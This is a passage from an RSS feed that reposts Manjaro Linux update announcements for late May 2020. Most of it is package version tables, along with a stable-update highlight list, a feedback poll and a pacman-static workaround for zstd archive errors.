              libretro-beetle-psx-hw               2284-1               2311-1
          libretro-beetle-supergrafx                808-1                810-1
                  libretro-core-info              1.8.6-1              1.8.8-1
                    libretro-desmume               6320-1               6322-1
                    libretro-dolphin              29758-1              29760-1
                    libretro-flycast               4133-1               4148-1
                     libretro-kronos               6190-1               6598-1
                       libretro-mgba               6701-1               6706-1
                   libretro-nestopia               1:15-1               1:17-1
               libretro-parallel-n64               5145-1               5173-1
                       libretro-play               5652-2               5668-1
                     libretro-ppsspp              26925-2              27164-1
                    libretro-yabause               3293-1               3294-1
                       libsemigroups              1.0.9-1              1.1.0-1
                       libwebsockets              4.0.1-1             4.0.13-1
                              libzdb              3.2.1-1              3.2.2-1
                            lollypop             1.2.35-1              1.3.0-1
                             mailnag  1.3.0+49+g1ec3bc9-1              2.0.0-1
                 mailnag-gnome-shell             3.34.0-1             3.36.0-1
                  mailnag-goa-plugin   1.2.0+3+ga8ccbe7-1              2.0.0-1
                         materia-kde           20200312-1           20200523-1
                      matrix-synapse             1.12.4-1             1.13.0-1
                              mcomix         1.3.0.dev0-2         1.3.0.dev0-3
                          menu-cache              1.1.0-1              1.1.0-2
                              monero           0.15.0.5-1           0.16.0.0-1
                             mypaint             1.2.1-12              2.0.0-1
               netfilter-fullconenat       r73.0cf3b48-21       r73.0cf3b48-22
                  nextcloud-app-news            14.1.10-1            14.1.11-1
                 nextcloud-app-notes              3.3.0-1              3.3.1-1
                   nodejs-lts-erbium            12.16.3-1            12.17.0-1
                            nvme-cli             1.11.1-1             1.11.2-1
                             openbve            1.7.1.3-2            1.7.1.5-1
                           osinfo-db           20200214-1           20200515-1
                              pandoc           2.9.2.1-49           2.9.2.1-54
                     pandoc-citeproc             0.17-110             0.17-115
                     pandoc-crossref          0.3.6.2-105            0.3.6.3-1
                     pantheon-camera              1.0.5-1              1.0.6-1
                             pcmanfm              1.3.1-1              1.3.1-2
                        pcmanfm-gtk3              1.3.1-1              1.3.1-2
                          pdfmixtool                0.5-2                0.6-1
                          photoflare              1.6.3-1              1.6.4-1
                              pitivi              0.999-3              0.999-4
                           postgrest              7.0.1-5              7.0.1-8
                     python-aiofiles              0.4.0-4              0.5.0-1
                  python-argon2_cffi             19.2.0-1             20.1.0-1
                       python-astral                2.1-1                2.2-1
           python-aws-sam-translator             1.23.0-1             1.24.0-1
                      python-blessed             1.17.5-1             1.17.6-1
                        python-boto3            1.13.10-1            1.13.17-1
                     python-botocore            1.16.10-1            1.16.17-1
              python-buildbot-badges              2.7.0-2              2.8.0-1
        python-buildbot-console-view              2.7.0-2              2.8.0-1
           python-buildbot-grid-view              2.7.0-2              2.8.0-1
      python-buildbot-waterfall-view              2.7.0-2              2.8.0-1
     python-buildbot-wsgi-dashboards              2.7.0-2              2.8.0-1
                 python-buildbot-www              2.7.0-2              2.8.0-1
                       python-cftime              1.1.2-1              1.1.3-1
                python-elasticsearch              7.7.0-1              7.7.1-1
                    python-fonttools             4.10.2-1             4.11.0-1
                       python-gevent             20.5.1-1             20.5.2-1
                 python-graphql-core              3.1.0-1              3.1.1-1
                   python-hypothesis             5.15.1-1             5.16.0-1
                     python-identify             1.4.16-1             1.4.17-1
                    python-jellyfish              0.7.2-3              0.8.2-1
                        python-json5              0.9.4-1              0.9.5-1
                   python-kiwisolver              1.1.0-4              1.2.0-1
                         python-mpd2              1.0.0-5              1.1.0-1
                     python-numpydoc              0.9.2-1              1.0.0-1
                       python-orjson              3.0.1-1              3.0.2-1
                      python-osc-lib              2.0.0-1              2.1.0-1
                     python-pdfminer           20200402-1           20200517-1
                python-podcastparser              0.6.4-4              0.6.5-1
                     python-prawcore              1.3.0-1              1.4.0-1
                  python-pysol_cards             0.8.14-1             0.8.16-1
              python-pytest-randomly              3.3.1-1              3.4.0-1
                  python-pytest-trio              0.5.2-2              0.6.0-1
                        python-quart             0.11.4-1             0.12.0-1
                       python-sphinx              3.0.3-1              3.0.4-1
                         python-trio             0.14.0-1             0.15.1-1
                    python-uhashring                1.1-4                1.2-1
                      python2-gevent             20.5.1-1             20.5.2-1
                                qgis             3.12.1-1             3.12.3-1
                    qt5-styleplugins    5.0.0.20170311-20                    -
                             qtspell              0.8.5-3              0.9.0-1
                            quiterss             0.19.3-1             0.19.4-1
                              rclone             1.51.0-4             1.52.0-1
                               redis              6.0.3-1              6.0.4-1
                             redmine              4.1.0-2              4.1.1-1
                            restinio              0.6.7-1              0.6.8-1
                           retroarch              1.8.7-1              1.8.8-1
              retroarch-assets-ozone              1:300-1              1:305-1
                retroarch-assets-xmb              1:300-1              1:305-1
                      rime-cantonese     0.0.0.20200525-1     0.0.0.20200529-1
                          rime-essay     0.0.0.20200207-1     0.0.0.20200528-1
                        riot-desktop              1.6.0-2              1.6.2-1
                            riot-web              1.6.0-2              1.6.2-1
               riscv64-linux-gnu-gdb                9.1-1                9.2-1
                            rssguard              3.5.9-1              3.6.2-1
                rssguard-nowebengine              3.5.9-1              3.6.2-1
                          shellcheck             0.7.1-28             0.7.1-33
                                 snd               20.3-1               20.4-1
                           sniffglue             0.10.1-1             0.11.0-1
                                solr              8.5.1-1              8.5.2-1
                           spice-gtk               0.37-1               0.38-1
                       spice-vdagent             0.20.0-1  0.20.0+6+g8adf50d-1
                      squashfs-tools                4.4-1                4.4-2
                                sssd              2.3.0-1              2.3.0-2
                               stack             2.3.1-20             2.3.1-23
                            startdde            5.3.0.1-3            5.4.0.1-1
                     stylish-haskell          0.11.0.0-25          0.11.0.0-27
                               sugar              0.116-1              0.117-1
                  sugar-activity-log                 41-2                 42-1
                       sugar-artwork              0.116-1              0.117-1
                     sugar-datastore              0.116-1              0.117-1
                  sugar-toolkit-gtk3 0.116+16+g72d36cc9-1              0.117-1
           switchboard-plug-datetime              2.1.7-1              2.1.8-1
   switchboard-plug-security-privacy              2.2.3-1              2.2.4-1
                      tamarin-prover            1.4.1-347            1.4.1-350
                             taskell           1.9.2.0-99          1.9.2.0-102
                              texlab              2.1.0-1              2.2.0-1
                            three.js               r116-1               r117-1
                               tiled              1.3.4-1              1.3.5-1
                         tpm2-pkcs11              1.2.0-1              1.2.0-2
                             ts-node             8.10.1-1             8.10.2-1
                           uglify-js              3.9.3-1              3.9.4-1
                          unrealircd            5.0.3.1-1              5.0.5-1
                             utf8cpp                3.1-1              3.1.1-1
         v2ray-domain-list-community       202005261114-1       202005290559-1
                         v2ray-geoip       202005200002-1       202005270003-1
        wingpanel-indicator-datetime              2.2.2-1              2.2.3-1
                            workrave            1.10.34-1            1.10.44-1
                              xmobar              0.33-56              0.33-59
                             yoshimi              1.7.1-1              1.7.1-2
                                zint              2.7.1-1              2.8.0-1
                             zint-qt              2.7.1-1              2.8.0-1
                        avisynthplus                    -              3.6.0-2
                       haskell-these                    -                1.1-1
                                 nut                    -              2.7.4-1
                         python-cppy                    -              1.1.0-1
                      python-install                    -              0.0.1-1
                         python-py3c                    -                1.1-1
                        python-typer                    -              0.2.1-1
                   v4l2loopback-dkms                    -             0.12.5-1


:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-26           2020-05-29
-------------------------------------------------------------------------------
                                bash            5.0.016-1            5.0.017-1
                      bashrc-manjaro            5.0.016-1            5.0.017-1
                            linux414           4.14.181-1           4.14.182-1
                    linux414-headers           4.14.181-1           4.14.182-1
                            linux419           4.19.124-1           4.19.125-1
                    linux419-headers           4.19.124-1           4.19.125-1
                             linux44            4.4.224-1            4.4.225-1
                     linux44-headers            4.4.224-1            4.4.225-1
                             linux49            4.9.224-1            4.9.225-1
                     linux49-headers            4.9.224-1            4.9.225-1
                             linux54             5.4.42-1             5.4.43-1
                     linux54-headers             5.4.42-1             5.4.43-1
                             linux56             5.6.14-1             5.6.15-1
                     linux56-headers             5.6.14-1             5.6.15-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-26           2020-05-29
-------------------------------------------------------------------------------
                           amd-ucode   20200421.78c0348-1   20200519.8ba6fa6-1
                      linux-firmware   20200421.78c0348-1   20200519.8ba6fa6-1
                                nano              4.9.2-1              4.9.3-1
                             openssh              8.2p1-3              8.3p1-1
                              sqlite             3.31.1-1             3.32.1-1
                     sqlite-analyzer             3.31.1-1             3.32.1-1
                          sqlite-doc             3.31.1-1             3.32.1-1
                          sqlite-tcl             3.31.1-1             3.32.1-1


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-26           2020-05-29
-------------------------------------------------------------------------------
                  linux414-acpi_call            1.1.0-153            1.1.0-154
                   linux414-bbswitch              0.8-153              0.8-154
                linux414-broadcom-wl     6.30.223.271-153     6.30.223.271-154
                linux414-ndiswrapper               1.63-3               1.63-4
               linux414-nvidia-340xx           340.108-22           340.108-23
               linux414-nvidia-390xx           390.132-30           390.132-31
               linux414-nvidia-418xx           418.113-27           418.113-28
               linux414-nvidia-430xx            430.64-28            430.64-29
               linux414-nvidia-435xx            435.21-38            435.21-39
               linux414-nvidia-440xx             440.82-7             440.82-8
                   linux414-nvidiabl             0.88-153             0.88-154
                      linux414-r8168           8.048.02-5           8.048.02-6
                  linux414-rt3562sta       2.4.1.1_r4-153       2.4.1.1_r4-154
                   linux414-tp_smapi              0.43-45              0.43-46
                linux414-vhba-module          20200106-16          20200106-17
    linux414-virtualbox-host-modules              6.1.8-2              6.1.8-3
                        linux414-zfs              0.8.4-2              0.8.4-3
                  linux419-acpi_call            1.1.0-114            1.1.0-115
                   linux419-bbswitch              0.8-114              0.8-115
                linux419-broadcom-wl     6.30.223.271-113     6.30.223.271-114
                linux419-ndiswrapper               1.63-4               1.63-5
               linux419-nvidia-340xx           340.108-34           340.108-35
               linux419-nvidia-390xx           390.132-43           390.132-44
               linux419-nvidia-418xx           418.113-42           418.113-43
               linux419-nvidia-430xx            430.64-42            430.64-43
               linux419-nvidia-435xx            435.21-53            435.21-54
               linux419-nvidia-440xx            440.82-11            440.82-12
                   linux419-nvidiabl             0.88-113             0.88-114
                      linux419-r8168           8.048.02-7           8.048.02-8
                  linux419-rtl8723bu          20200405-10          20200405-11
                   linux419-tp_smapi              0.43-63              0.43-64
                linux419-vhba-module          20200106-28          20200106-29
   linux419-virtualbox-guest-modules              6.1.8-2              6.1.8-3
    linux419-virtualbox-host-modules              6.1.8-2              6.1.8-3
                        linux419-zfs              0.8.4-3              0.8.4-4
                   linux44-acpi_call            1.1.0-155            1.1.0-156
                    linux44-bbswitch              0.8-155              0.8-156
                 linux44-broadcom-wl     6.30.223.271-125     6.30.223.271-126
                 linux44-ndiswrapper               1.63-3               1.63-4
                linux44-nvidia-340xx           340.108-19           340.108-20
                linux44-nvidia-390xx           390.132-25           390.132-26
                linux44-nvidia-418xx           418.113-24           418.113-25
                linux44-nvidia-430xx            430.64-23            430.64-24
                linux44-nvidia-435xx            435.21-25            435.21-26
                linux44-nvidia-440xx             440.82-7             440.82-8
                    linux44-nvidiabl             0.88-155             0.88-156
                       linux44-r8168           8.048.02-5           8.048.02-6
                   linux44-rt3562sta       2.4.1.1_r4-112       2.4.1.1_r4-113
                    linux44-tp_smapi              0.43-34              0.43-35
                 linux44-vhba-module          20200106-16          20200106-17
     linux44-virtualbox-host-modules              6.1.8-2              6.1.8-3
                         linux44-zfs              0.8.4-2              0.8.4-3
                   linux49-acpi_call            1.1.0-169            1.1.0-170
                    linux49-bbswitch              0.8-169              0.8-170
                 linux49-broadcom-wl     6.30.223.271-169     6.30.223.271-170
                 linux49-ndiswrapper               1.63-3               1.63-4
                linux49-nvidia-340xx           340.108-19           340.108-20
                linux49-nvidia-390xx           390.132-26           390.132-27
                linux49-nvidia-418xx           418.113-25           418.113-26
                linux49-nvidia-430xx            430.64-24            430.64-25
                linux49-nvidia-435xx            435.21-31            435.21-32
                linux49-nvidia-440xx             440.82-7             440.82-8
                    linux49-nvidiabl             0.88-169             0.88-170
                       linux49-r8168           8.048.02-5           8.048.02-6
                   linux49-rt3562sta       2.4.1.1_r4-153       2.4.1.1_r4-154
                    linux49-tp_smapi              0.43-37              0.43-38
                 linux49-vhba-module          20200106-16          20200106-17
     linux49-virtualbox-host-modules              6.1.8-2              6.1.8-3
                         linux49-zfs              0.8.4-2              0.8.4-3
                   linux54-acpi_call             1.1.0-48             1.1.0-49
                    linux54-bbswitch               0.8-48               0.8-49
                 linux54-broadcom-wl      6.30.223.271-48      6.30.223.271-49
                 linux54-ndiswrapper               1.63-4               1.63-5
                linux54-nvidia-340xx           340.108-40           340.108-41
                linux54-nvidia-390xx           390.132-48           390.132-49
                linux54-nvidia-418xx           418.113-48           418.113-49
                linux54-nvidia-430xx            430.64-48            430.64-49
                linux54-nvidia-435xx            435.21-48            435.21-49
                linux54-nvidia-440xx            440.82-15            440.82-16
                    linux54-nvidiabl              0.88-48              0.88-49
                       linux54-r8168           8.048.02-8           8.048.02-9
                   linux54-rtl8723bu          20200405-12          20200405-13
                    linux54-tp_smapi              0.43-48              0.43-49
                 linux54-vhba-module          20200106-33          20200106-34
    linux54-virtualbox-guest-modules              6.1.8-2              6.1.8-3
     linux54-virtualbox-host-modules              6.1.8-2              6.1.8-3
                         linux54-zfs              0.8.4-3              0.8.4-4
                   linux56-acpi_call             1.1.0-18             1.1.0-19
                    linux56-bbswitch               0.8-18               0.8-19
                 linux56-broadcom-wl      6.30.223.271-18      6.30.223.271-19
                 linux56-ndiswrapper               1.63-4               1.63-5
                linux56-nvidia-340xx           340.108-18           340.108-19
                linux56-nvidia-390xx           390.132-18           390.132-19
                linux56-nvidia-418xx           418.113-18           418.113-19
                linux56-nvidia-430xx            430.64-18            430.64-19
                linux56-nvidia-435xx            435.21-18            435.21-19
                linux56-nvidia-440xx            440.82-16            440.82-17
                       linux56-r8168          8.048.02-10          8.048.02-11
                   linux56-rtl8723bu          20200405-18          20200405-19
                    linux56-tp_smapi              0.43-18              0.43-19
                 linux56-vhba-module          20200106-18          20200106-19
    linux56-virtualbox-guest-modules              6.1.8-2              6.1.8-3
     linux56-virtualbox-host-modules              6.1.8-2              6.1.8-3
                         linux56-zfs              0.8.4-3              0.8.4-4
                           pamac-cli            9.5.1-6.1            9.5.1-6.2
                       pamac-cli-dev              9.5.1-4              9.5.1-5
                        pamac-common            9.5.1-6.1            9.5.1-6.2
                    pamac-common-dev              9.5.1-4              9.5.1-5
                pamac-flatpak-plugin            9.5.1-6.1            9.5.1-6.2
            pamac-flatpak-plugin-dev              9.5.1-4              9.5.1-5
             pamac-gnome-integration            9.5.1-6.1            9.5.1-6.2
         pamac-gnome-integration-dev              9.5.1-4              9.5.1-5
                           pamac-gtk            9.5.1-6.1            9.5.1-6.2
                       pamac-gtk-dev              9.5.1-4              9.5.1-5
                   pamac-snap-plugin            9.5.1-6.1            9.5.1-6.2
               pamac-snap-plugin-dev              9.5.1-4              9.5.1-5
             pamac-tray-appindicator            9.5.1-6.1            9.5.1-6.2
         pamac-tray-appindicator-dev              9.5.1-4              9.5.1-5


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-26           2020-05-29
-------------------------------------------------------------------------------
                              amdvlk          2020.Q2.3-1          2020.Q2.4-1
                            apparmor             2.13.4-4             2.13.4-5
                            apricots             0.2.6-10             0.2.6-11
                   audacious-plugins              4.0.3-1              4.0.3-2
                               cmake             3.17.2-2             3.17.3-1
                                dkms              2.8.1-2              2.8.1-3
                              ffmpeg            1:4.2.2-8            1:4.2.3-2
                          fluidsynth              2.1.2-1              2.1.3-1
                                 fmt              6.2.1-1              6.2.1-2
                         foomatic-db         3:20200428-1         3:20200529-1
                 foomatic-db-nonfree         3:20200428-1         3:20200529-1
            foomatic-db-nonfree-ppds         3:20200428-1         3:20200529-1
                    foomatic-db-ppds         3:20200428-1         3:20200529-1
                                 gdb                9.1-4                9.2-1
                          gdb-common                9.1-4                9.2-1
                     glib-networking             2.64.2-1             2.64.3-1
                        gnu-efi-libs             3.0.11-2                    -
                                kexi              3.2.0-1              3.2.0-2
                             konsole            20.04.1-1            20.04.1-3
                              libdrm            2.4.101-1            2.4.102-1
                        libinstpatch              1.1.4-1              1.1.5-1
                         libktorrent              2.1.1-1              2.1.1-2
                          messagelib            20.04.1-1            20.04.1-2
                               munin             2.0.61-1             2.0.63-2
                          munin-node             2.0.61-1             2.0.63-2
                              netpbm           10.73.31-1           10.73.31-2
                        perl-net-dns               1.23-1               1.24-1
                             pkgfile                 21-1                 21-2
              plasma-wayland-session             5.18.5-2             5.18.5-3
                    plasma-workspace             5.18.5-2             5.18.5-3
                   python-setuptools           1:46.4.0-1           1:47.1.1-1
                         sbsigntools              0.9.3-1              0.9.3-2
                             tomcat7            7.0.100-1            7.0.104-1
                             tomcat8             8.5.51-1             8.5.55-1
                             tomcat9             9.0.34-1             9.0.35-1
                          x2goserver            4.1.0.3-4            4.1.0.3-5
                             gnu-efi                    -             3.0.12-1


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-26           2020-05-29
-------------------------------------------------------------------------------
                        lib32-amdvlk          2020.Q2.3-1          2020.Q2.4-1
                    lib32-fluidsynth              2.1.2-1              2.1.3-1
                        lib32-libdrm            2.4.101-1            2.4.102-1
                  lib32-libinstpatch              1.1.4-1              1.1.5-1
                        lib32-sqlite             3.31.1-1             3.32.1-1
                               pcsx2             1.4.0-10              1.6.0-1

</code></pre>
<div class="poll" data-poll-status="open" data-poll-type="regular" data-poll-name="poll">
<div>
<div class="poll-container">
<ul><li data-poll-option-id="893d9543968a33fa1039e2d7c2aff9f3">No issue, everything went smoothly</li>
<li data-poll-option-id="f62cf202dc0ce246aa612290c3f33f1f">Yes there was an issue. I was able to resolve it myself.(Please post your solution)</li>
<li data-poll-option-id="e1ee941aacf54cee0c82939acae184cc">Yes i am currently experiencing an issue due to the update. (Please post about it)</li>
</ul></div>
<div class="poll-info">
<p>
<span class="info-number">0</span>
<span class="info-label">voters</span>
</p>
</div>
</div>
</div>
<p>Check if your mirror has already synced:</p>
<ul><li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul><p><small>2 posts - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2020-05-29-kernels-amdvlk-deepin-cinnamon-gnome-haskell-python/145269">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2020-05-11 - Kernels, Systemd 245.5, Browsers, Thunderbird, Pamac, Deepin 20, Pamac 9.5]]></title>
<description><![CDATA[Hello community,
Another stable branch update with some interesting updates for you!

1912×967Get Gnome 20.0.1 and have fun! #stayhome, #staysave, #stayhealthy
Most of our Kernels got updated

Systemd is now at 245.5


KDE-git packages got updated

Thunderbird is at 68.8.0


Pamac 9.5 got its rel...]]></description>
<link>https://tsecurity.de/de/1112729/unix-server/stable-update-2020-05-11-kernels-systemd-2455-browsers-thunderbird-pamac-deepin-20-pamac-95/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1112729/unix-server/stable-update-2020-05-11-kernels-systemd-2455-browsers-thunderbird-pamac-deepin-20-pamac-95/</guid>
<pubDate>Mon, 11 May 2020 11:33:33 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello community,</p>
<p>Another <strong>stable</strong> branch update with some interesting updates for you!</p>
<p></p><div class="lightbox-wrapper"><a class="lightbox" href="https://pbs.twimg.com/media/EXfKH44XkAAiKXh?format=jpg&amp;name=large" title=""><img src="https://pbs.twimg.com/media/EXfKH44XkAAiKXh?format=jpg&amp;name=large" alt width="690" height="348"><div class="meta">
<svg class="fa d-icon d-icon-far-image svg-icon" aria-hidden="true"><use xlink:href="#far-image"></use></svg><span class="filename"></span><span class="informations">1912×967</span><svg class="fa d-icon d-icon-discourse-expand svg-icon" aria-hidden="true"><use xlink:href="#discourse-expand"></use></svg></div></a></div><br><em>Get <a href="https://osdn.net/projects/manjaro/storage/gnome/20.0.1/">Gnome 20.0.1</a> and have fun! <span class="hashtag">#stayhome</span>, <span class="hashtag">#staysave</span>, <span class="hashtag">#stayhealthy</span></em>
<ul><li>Most of our <strong>Kernels</strong> got updated</li>
<li>
<strong>Systemd</strong> is now at <a href="https://github.com/systemd/systemd-stable/blob/9a506b7e9291d997a920af9ac299e7b834368119/NEWS">245.5</a>
</li>
<li>
<strong>KDE-git</strong> packages got updated</li>
<li>
<strong>Thunderbird</strong> is at <a href="https://www.thunderbird.net/en-US/thunderbird/68.8.0/releasenotes/">68.8.0</a>
</li>
<li>
<strong>Pamac</strong> 9.5 got its <a href="https://gitlab.manjaro.org/applications/pamac/-/tags">released</a>. Find out <a href="https://forum.manjaro.org/t/pamac-9-5/141474">more</a>
</li>
<li>
<strong>Deepin</strong> got updated to <strong>v20</strong> series</li>
<li>Some of our browsers got updated: <a href="https://www.mozilla.org/en-US/firefox/76.0.1/releasenotes/">Firefox 76.0.1</a>, <a href="https://www.mozilla.org/en-US/firefox/77.0beta/releasenotes/">Firefox-Dev 77.0b3</a>, <a href="https://www.palemoon.org/releasenotes.shtml">Palemoon 28.9.3</a>
</li>
<li>The usual upstream updates</li>
</ul><p>If you like following latest Plasma development you may also like to check out our current version of <a href="https://osdn.net/projects/manjaro-community/storage/kde-dev/20.0/">manjaro-kde-dev</a>, which we build on a regular basis against kde-git master packages. Also check out stable release of <strong>Manjaro Lysia 20.0.1</strong>! <a href="https://osdn.net/projects/manjaro/storage/xfce/20.0.1/">XFCE</a>, <a href="https://osdn.net/projects/manjaro/storage/kde/20.0.1/">KDE</a> and <a href="https://osdn.net/projects/manjaro/storage/gnome/20.0.1/">Gnome</a></p>
<hr><h3>Upstream notice</h3>
<p><strong>Arch</strong> updated their default compression to <a href="https://lists.archlinux.org/pipermail/arch-dev-public/2019-December/029752.html">zstd</a>. We adopted to the same standard. More and more packages will have the <code>zst</code> extension from now on. If you get for what ever reason an error with ZSTD not supported as archive format you can do this:</p>
<pre><code class="lang-auto">sudo pacman -Syy
sudo pacman -S pacman-static
sudo pacman-static -Syyu
</code></pre>
<hr><p><strong>Our current supported kernels</strong></p>
<ul><li>linux316 3.16.83</li>
<li>linux44 4.4.222</li>
<li>linux49 4.9.222</li>
<li>linux414 4.14.179</li>
<li>linux419 4.19.121</li>
<li>linux54 5.4.39</li>
<li>linux55 5.5.19 EOL</li>
<li>linux56 5.6.11</li>
<li>linux57 5.7-rc4</li>
<li>linux54-rt 5.4.28_rt19</li>
<li>linux56-rt 5.6.10_rt5</li>
</ul><p><strong>Package Changes</strong> (Sun May 10 10:41:45 CEST 2020)</p>
<ul><li>stable community x86_64:  572 new and 573 removed package(s)</li>
<li>stable core x86_64:  34 new and 35 removed package(s)</li>
<li>stable extra x86_64:  476 new and 475 removed package(s)</li>
<li>stable multilib x86_64:  14 new and 15 removed package(s)</li>
</ul><pre><code class="lang-auto">

:: Different overlay package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-08           2020-05-11
-------------------------------------------------------------------------------
                          breeze-git5.18.80.r1984.g1a9dc381-15.18.80.r1989.g34862b27-1
                    breeze-icons-git5.70.0.r1554.g3e961ab3-15.70.0.r1555.gb94a7284-1
                               cpu-x3.2.4.r248.g10766c6-13.2.4.r256.g33c0406-1
      deepin-desktop-schemas-manjaro             3.13.9-1         5.4.0099.0-1
        deepin-file-manager-nomodule              5.0.0-5           5.1.1.25-1
                   deepin-wallpapers            2:1.7.5-2            2:1.7.7-1
                           downgrade              6.3.0-1              7.0.0-1
             extra-cmake-modules-git5.70.0.r3151.g8d18163-15.70.0.r3153.gbac7608-1
                             gtkhash                1.2-3                1.2-4
                        gtkhash-caja                1.2-3                1.2-4
                    gtkhash-nautilus                1.2-3                1.2-4
                        gtkhash-nemo                1.2-3                1.2-4
                      gtkhash-thunar                1.2-3                1.2-4
                                 jwm              2.3.7-1                    -
               kactivitymanagerd-git5.15.80.r1273.g50bde7c-15.15.80.r1274.g3bc86ea-1
                      kbookmarks-git5.70.0.r331.g8a28231-15.70.0.r333.g1d8d223-1
                     kcompletion-git5.70.0.r358.g9d05a00-15.70.0.r359.g5b08593-1
                         kconfig-git5.70.0.r688.g311e308-15.70.0.r689.g8e0f840-1
                     kcoreaddons-git5.70.0.r974.g7804a0c-15.70.0.r975.g0824e28-1
                    kdeclarative-git5.70.0.r771.g66c82cd-15.70.0.r772.g9725a21-1
                kdeplasma-addons-git5.18.80.r8335.g786062f1d-15.18.80.r8336.g1d64bd119-1
                             kio-git5.70.0.r3930.g692d9bc8-15.70.0.r3937.g81a7b118-1
                      kitemviews-git5.70.0.r267.g5ccc82f-15.70.0.r268.gdf9e5d3-1
                      knetattach-git5.18.80.r7592.g1d557e8a7-15.18.80.r7597.geeab79954-1
                  knotifications-git5.70.0.r528.g2012f67-15.70.0.r532.ga39883c-1
                     ksshaskpass-git5.18.80.r158.g54d2fa6-15.18.80.r159.g64d6c18-1
                       ksysguard-git5.18.80.r3242.g8e2603a6-15.18.80.r3244.gdbb0b515-1
                  kwidgetsaddons-git5.70.0.r663.g5a2ea81-15.70.0.r668.g5904c47-1
                            libcpuid 0.4.1.r35.g9d22c61-1 0.4.1.r50.g21e4b1f-1
                    libksysguard-git5.18.80.r1786.gd8e4677-15.18.80.r1789.gb1e9126-1
              linux56-rt-ndiswrapper               1.62-3               1.63-1
                        palemoon-bin             28.9.2-1             28.9.3-1
                    palemoon-i18n-ar             28.9.2-1             28.9.3-1
                    palemoon-i18n-bg             28.9.2-1             28.9.3-1
                    palemoon-i18n-cs             28.9.2-1             28.9.3-1
                    palemoon-i18n-da             28.9.2-1             28.9.3-1
                    palemoon-i18n-de             28.9.2-1             28.9.3-1
                    palemoon-i18n-el             28.9.2-1             28.9.3-1
                 palemoon-i18n-en-gb             28.9.2-1             28.9.3-1
                 palemoon-i18n-es-ar             28.9.2-1             28.9.3-1
                 palemoon-i18n-es-es             28.9.2-1             28.9.3-1
                 palemoon-i18n-es-mx             28.9.2-1             28.9.3-1
                    palemoon-i18n-fi             28.9.2-1             28.9.3-1
                    palemoon-i18n-fr             28.9.2-1             28.9.3-1
                    palemoon-i18n-gl             28.9.2-1             28.9.3-1
                    palemoon-i18n-hr             28.9.2-1             28.9.3-1
                    palemoon-i18n-hu             28.9.2-1             28.9.3-1
                    palemoon-i18n-id             28.9.2-1             28.9.3-1
                    palemoon-i18n-is             28.9.2-1             28.9.3-1
                    palemoon-i18n-it             28.9.2-1             28.9.3-1
                    palemoon-i18n-ja             28.9.2-1             28.9.3-1
                    palemoon-i18n-kn             28.9.2-1             28.9.3-1
                    palemoon-i18n-ko             28.9.2-1             28.9.3-1
                    palemoon-i18n-nl             28.9.2-1             28.9.3-1
                    palemoon-i18n-pl             28.9.2-1             28.9.3-1
                 palemoon-i18n-pt-br             28.9.2-1             28.9.3-1
                 palemoon-i18n-pt-pt             28.9.2-1             28.9.3-1
                    palemoon-i18n-ro             28.9.2-1             28.9.3-1
                    palemoon-i18n-ru             28.9.2-1             28.9.3-1
                    palemoon-i18n-sk             28.9.2-1             28.9.3-1
                    palemoon-i18n-sl             28.9.2-1             28.9.3-1
                    palemoon-i18n-sr             28.9.2-1             28.9.3-1
                 palemoon-i18n-sv-se             28.9.2-1             28.9.3-1
                    palemoon-i18n-tl             28.9.2-1             28.9.3-1
                    palemoon-i18n-tr             28.9.2-1             28.9.3-1
                    palemoon-i18n-uk             28.9.2-1             28.9.3-1
                    palemoon-i18n-vi             28.9.2-1             28.9.3-1
                 palemoon-i18n-zh-cn             28.9.2-1             28.9.3-1
                 palemoon-i18n-zh-tw             28.9.2-1             28.9.3-1
      plasma-browser-integration-git5.18.80.r1086.g64a63f2b-15.18.80.r1087.g811ae0dd-1
                  plasma-desktop-git5.18.80.r7592.g1d557e8a7-15.18.80.r7597.geeab79954-1
                plasma-framework-git5.70.0.r15423.g68d5995c6-15.70.0.r15425.g1bc004e5c-1
                       plasma-nm-git5.18.80.r2861.gbe3eaeef-15.18.80.r2863.g7c915638-1
                      plasma-sdk-git5.18.80.r2169.g2b7106b-15.18.80.r2170.g9010d95-1
     plasma-workspace-wallpapers-git5.18.80.r194.gcfd156e-15.18.80.r199.gf9d6a73-1
                      powerdevil-git5.18.80.r2271.g45dd7bbf-15.18.80.r2272.gaa60c4f6-1
                         purpose-git5.70.0.r754.g095ed6b-15.70.0.r756.g8cd6cca-1
                 deepin-desktop-base                    -       3:2019.07.10-1
              linux54-rt-ndiswrapper                    -               1.63-1
                      qgnomeplatform                    -   0.6.0+8+gd4277c9-1


:: Different sync package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-08           2020-05-11
-------------------------------------------------------------------------------
               aarch64-linux-gnu-gcc              9.3.0-1             10.1.0-1
                             acme.sh              2.8.5-1              2.8.6-1
                               acorn            1:7.1.1-1            1:7.2.0-1
                                acpi                1.7-2                1.7-3
                          aliyun-cli             3.0.37-2             3.0.42-1
                             amsynth              1.9.0-1             1.10.0-1
                                anki             2.1.23-1             2.1.26-1
                        ansible-lint              4.2.0-1              4.2.0-3
                                 apm              2.4.5-2              2.5.0-1
                          arch-audit             0.1.15-1             0.1.15-2
                     archlinux-repro           20200502-1           20200507-1
                               aria2             1.35.0-1             1.35.0-2
                               ascii               3.18-1               3.18-2
                                atom             1.45.0-1             1.46.0-1
                          autocutsel             0.10.0-2             0.10.0-3
                         baidupcs-go              3.6.2-1              3.6.2-2
                bash-language-server             1.13.1-2             1.14.0-1
                                 bat             0.13.0-1             0.15.0-1
                              batctl             2020.0-1             2020.1-1
                              bemenu              0.3.0-3              0.4.0-1
                             benzene           20130630-1           20130630-2
                            binaryen               1:91-1               1:93-1
                            bonnie++             1.97.3-1             1.97.3-2
